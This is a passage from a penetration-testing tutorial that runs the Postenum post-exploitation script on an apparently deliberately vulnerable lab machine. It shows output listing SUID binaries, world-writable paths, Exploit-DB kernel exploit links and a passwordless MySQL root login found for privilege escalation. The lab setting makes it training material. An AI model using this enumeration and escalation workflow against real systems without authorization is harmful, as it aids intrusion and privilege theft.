-rw-rw-rw- 1 root daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
-rw-r--r-- 1 root root 5 Dec  5  2007 /usr/share/python-support/antlr/.version
-rw-r--r-- 1 root root 2 Aug 29  2007 /usr/share/python-support/python-gnupginterface/.version
-rw-r--r-- 1 root root 0 May 20  2012 /usr/lib/firefox-3.6.17/.autoreg
-rw-r--r-- 1 root root 1258 Mar 10  2008 /usr/lib/jvm/.java-gcj.jinfo
-rw------- 1 root root 215 Jun 19 13:46 /root/.mysql_history
-rwx------ 1 root root 4 May 20  2012 /root/.rhosts
-rw-r--r-- 1 root root 141 Oct 20  2007 /root/.profile
-rw-r--r-- 1 root root 173 Jun 19  2019 /root/.bash_history
-rw------- 1 root root 324 Jun 19 13:21 /root/.Xauthority
-rw-r--r-- 1 root root 2227 Oct 20  2007 /root/.bashrc
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.monthly/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 586 Apr 14  2008 /etc/skel/.profile
-rw-r--r-- 1 root root 2928 Apr 14  2008 /etc/skel/.bashrc
-rw-r--r-- 1 root root 220 Apr 14  2008 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.hourly/.placeholder
-rw------- 1 root root 0 Mar 16  2010 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 Jun 19 13:20 /dev/.initramfs-tools
-rw------- 1 postgres postgres 34 Jun 19 13:21 /var/run/postgresql/.s.PGSQL.5432.lock
-rw-r--r-- 1 root root 34 May 13  2012 /var/lib/python-support/python2.5/.path
-rw------- 1 postgres postgres 131 Mar 30  2010 /var/lib/postgresql/.bash_history
-rwxr-xr-x 1 www-data www-data 497 Sep  8  2010 /var/www/dvwa/.htaccess
-rwxr-xr-x 1 www-data www-data 174 Apr 11  2011 /var/www/mutillidae/.buildpath
-rwxr-xr-x 1 www-data www-data 712 Apr 11  2011 /var/www/mutillidae/.project
-rwxr-xr-x 1 www-data www-data 427 May 14  2012 /var/www/mutillidae/.htaccess
-rw-r--r-- 1 www-data www-data 118 Dec  9  2008 /var/www/phpMyAdmin/libraries/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 22  2005 /var/www/tikiwiki-old/modules/cache/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 19  2005 /var/www/tikiwiki-old/templates_c/.htaccess
-rw-r--r-- 1 www-data www-data 1598 Jun  1  2002 /var/www/twiki/bin/.htaccess.txt
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Sandbox/.mailnotify
-rwxrwxrwx 1 www-data www-data 1436 Feb  1  2003 /var/www/twiki/data/Sandbox/.changes
-rw-r--r-- 1 www-data www-data 210 Jan 11  2003 /var/www/twiki/data/.htpasswd
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Main/.mailnotify
-rwxrwxrwx 1 www-data www-data 3653 Apr 16  2010 /var/www/twiki/data/Main/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Know/.mailnotify
-rwxrwxrwx 1 www-data www-data 3489 Jan 30  2003 /var/www/twiki/data/Know/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/TWiki/.mailnotify
-rwxrwxrwx 1 www-data www-data 4189 Feb  1  2003 /var/www/twiki/data/TWiki/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/_default/.mailnotify
-rwxrwxrwx 1 www-data www-data 683 Jan 30  2003 /var/www/twiki/data/_default/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Trash/.mailnotify
-rwxrwxrwx 1 www-data www-data 767 Jan 25  2003 /var/www/twiki/data/Trash/.changes
-rw------- 1 www-data www-data 4275 Jun 19  2019 /var/www/.bash_history
-rw-rw-r-- 1 www-data www-data 66 Jan 22  2005 /var/www/tikiwiki/modules/cache/.htaccess
-rw-rw-r-- 1 www-data www-data 66 Jan 19  2005 /var/www/tikiwiki/templates_c/.htaccess
-r--r--r-- 1 root root 11 Jun 19 13:21 /tmp/.X0-lock

[+] - Check for clear-text password on /home/*
[x] Clear text password:
-rwxr-xr-x 1 msfadmin msfadmin 6936 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/passwd

[+] - The most interesting ssh files /
[x] SSH files:
-rw-r--r-- 1 root root 442 May 20  2012 /root/.ssh/known_hosts
-rw-r--r-- 1 root root 405 May 17  2010 /root/.ssh/authorized_keys

[+] - Check sticky bits, SUID and SGID
[x] SUID - 4000:
-rwsr-xr-x 1 root root 63584 Apr 14  2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26  2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14  2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10  2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10  2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec  2  2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22  2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr  2  2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22  2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr  2  2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr  2  2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr  2  2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22  2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr  2  2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct  4  2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17  2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar  9  2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17  2009 /usr/lib/pt_chown

[x] SGID - 2000:
-rwxr-sr-x 1 root shadow 19584 Apr  9  2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22  2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12  2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr  6  2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar  8  2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr  8  2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr  2  2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23  2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr  2  2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan  2  2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14  2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18  2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18  2008 /usr/sbin/postdrop

[x] Sticky bit for folders - 1000:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxr-t 2 root postgres 4096 May  8  2010 /var/log/postgresql
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19  2019 /var/www/dav
drwxrwx--T 2 daemon daemon 4096 Mar 16  2010 /var/spool/cron/atjobs
drwxrwx--T 2 daemon daemon 4096 Feb 20  2007 /var/spool/cron/atspool
drwx-wx--T 2 root crontab 4096 Apr  8  2008 /var/spool/cron/crontabs
drwx-wx--T 2 postfix postdrop 4096 May  7  2010 /var/spool/postfix/maildrop
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix

[+] - Check for written and executable places
[x] World-writable folders - 222:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19  2019 /var/www/dav
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/data/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr 16  2010 /var/www/twiki/data/Main
drwxrwxrwx 2 www-data www-data 4096 Jan 30  2003 /var/www/twiki/data/Know
drwxrwxrwx 2 www-data www-data 16384 Feb  1  2003 /var/www/twiki/data/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 30  2003 /var/www/twiki/data/_default
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/data/Trash
drwxrwxrwx 2 www-data www-data 4096 Apr 21  2002 /var/www/twiki/pub/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr  7  2002 /var/www/twiki/pub/Main
drwxrwxrwx 3 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/Know
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
drwxrwxrwx 8 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 21  2003 /var/www/twiki/pub/TWiki/TWikiDocGraphics
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/TWikiTemplates
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/TWikiLogos
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/PreviewBackground
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/FileAttachment
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/WabiSabi
drwxrwxrwx 2 www-data www-data 4096 Dec  4  2001 /var/www/twiki/pub/Trash
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/pub/icn
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix

[x] World-writable files - 0002:
304795    4 -rw-rw-rw-   1 root     daemon          1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
304796    4 -rw-rw-rw-   1 root     daemon          1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
 11265    0 srw-rw-rw-   1 root     root            0 Jun 19 13:21 /dev/log
 10037    0 drwxrwxrwt   2 root     root           40 Jun 19 13:21 /dev/shm
  6130    0 crw-rw-rw-   1 root     root              Mar 16  2010 /dev/null
  5082    0 crw-rw-rw-   1 root     tty               Jun 19 13:20 /dev/ttyzf

...

[+] - Check for readable logfiles owned by root
[x] World-readable logfiles - 0004:
-rw-r--r-- 1 root root 88953 Jul  5  2018 /var/log/dpkg.log
-rw-r--r-- 1 root root 5376 Jun 19 13:22 /var/log/wtmp
-rw-r--r-- 1 root root 96 Mar 16  2010 /var/log/installer/lsb-release
-rw-r--r-- 1 root root 0 Mar 16  2010 /var/log/installer/initial-status.gz
-rw-r--r-- 1 root root 58721 Mar 16  2010 /var/log/installer/status
-rw-r--r-- 1 root root 46866 Mar 16  2010 /var/log/installer/hardware-summary
-rw-r--r-- 1 root adm 16950 Jun 19 13:41 /var/log/dmesg.0
-rw-r--r-- 1 root root 292114 Jun 19 13:20 /var/log/udev
-rw-r--r-- 1 root adm 6419 Jun 19 13:52 /var/log/dmesg.4.gz
-rw-r--r-- 1 root adm 6405 Jun 19 13:21 /var/log/dmesg.3.gz
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.crit
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.notice
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.err
-rw-r--r-- 1 root root 0 May 20  2012 /var/log/boot
-rw-r--r-- 1 root adm 6446 Jun 19 13:20 /var/log/dmesg.2.gz
-rw-r--r-- 1 root root 0 May 20  2012 /var/log/btmp
-rw-r--r-- 1 root adm 6414 Jun 19 13:21 /var/log/dmesg.1.gz
-rw-r--r-- 1 root root 292292 Jun 19 13:22 /var/log/lastlog
-rw-r--r-- 1 root adm 16992 Jun 19 13:21 /var/log/dmesg

[+] - List NFS shares and permisisons
[x] NFS:
-rw-r--r-- 1 root root 367 May 13  2012 /etc/exports

It begins by checking for any interesting files located in standard web server directories. Next, it looks for hidden files, SSH files, and any clear text passwords in the home directories. It will then check for SUID, SGID, and sticky bits. Finally, it looks for any writable and executable directories and includes any NFS shares that are present on the system.

Phase 9: OS Info & Kernel Exploits

The next option we'll look at will give us information pertaining to the operating system and will suggest any relevant kernel exploits that could potentially be used to escalate privileges and get root. Use the -o switch for this:

target:/var/tmp$ ./postenum.sh -o

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[x] The current user:
www-data

[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
 Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
 Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
 Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
 Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
 Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
 Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
 Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
 Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
 Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
 Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
 Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616

The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24

First, it will give us the current user and group information. It will then show us the distribution name and release number, followed by the kernel version and information about how the kernel was compiled. Next, it lists possible exploits based on the kernel version along with links to their Exploit Database pages.

Finally, there is one last option for Postenum — the ability to run all these options at once. Use the -a switch for this one:

target:/var/tmp$ ./postenum.sh -a

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[x] The current user:
www-data

[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
 Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
 Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
 Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
 Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
 Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
 Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
 Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
 Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
 Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
 Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
 Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616

The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24

[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x  2 root     root     4096 Jul  5  2018 cron.d
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.daily
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.hourly
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.monthly
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.weekly
-rw-r--r--  1 root     root      724 Apr  8  2008 crontab

[x] List /etc/cron.d/
-rw-r--r-- 1 root root  507 May  3  2012 php5
-rw-r--r-- 1 root root 1323 Mar 31  2008 postgresql-common

...

[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version          5.0.51a-3ubuntu5
Protocol version        10
Connection              Localhost via UNIX socket
UNIX socket             /var/run/mysqld/mysqld.sock
Uptime:                 41 min 2 sec

Threads: 2  Questions: 447  Slow queries: 0  Opens: 420  Flush tables: 1  Open tables: 64  Queries per second avg: 0.182

Be aware, this one can take some time since it runs all the options and gathers a lot of information.

Wrapping Up

Today, we learned how to use Postenum, a tool used to gather vital information during the post-exploitation phase. We first compromised the target and transferred the script from our machine. Then, we went over the various options Postenum provides, including gathering network and service information, exciting files, software versions, and other useful data that could ultimately be used for privilege escalation.

Cover image by Vitaly Vlasov/Pexels

Comments

No Comments Exist

Be the first, drop a comment!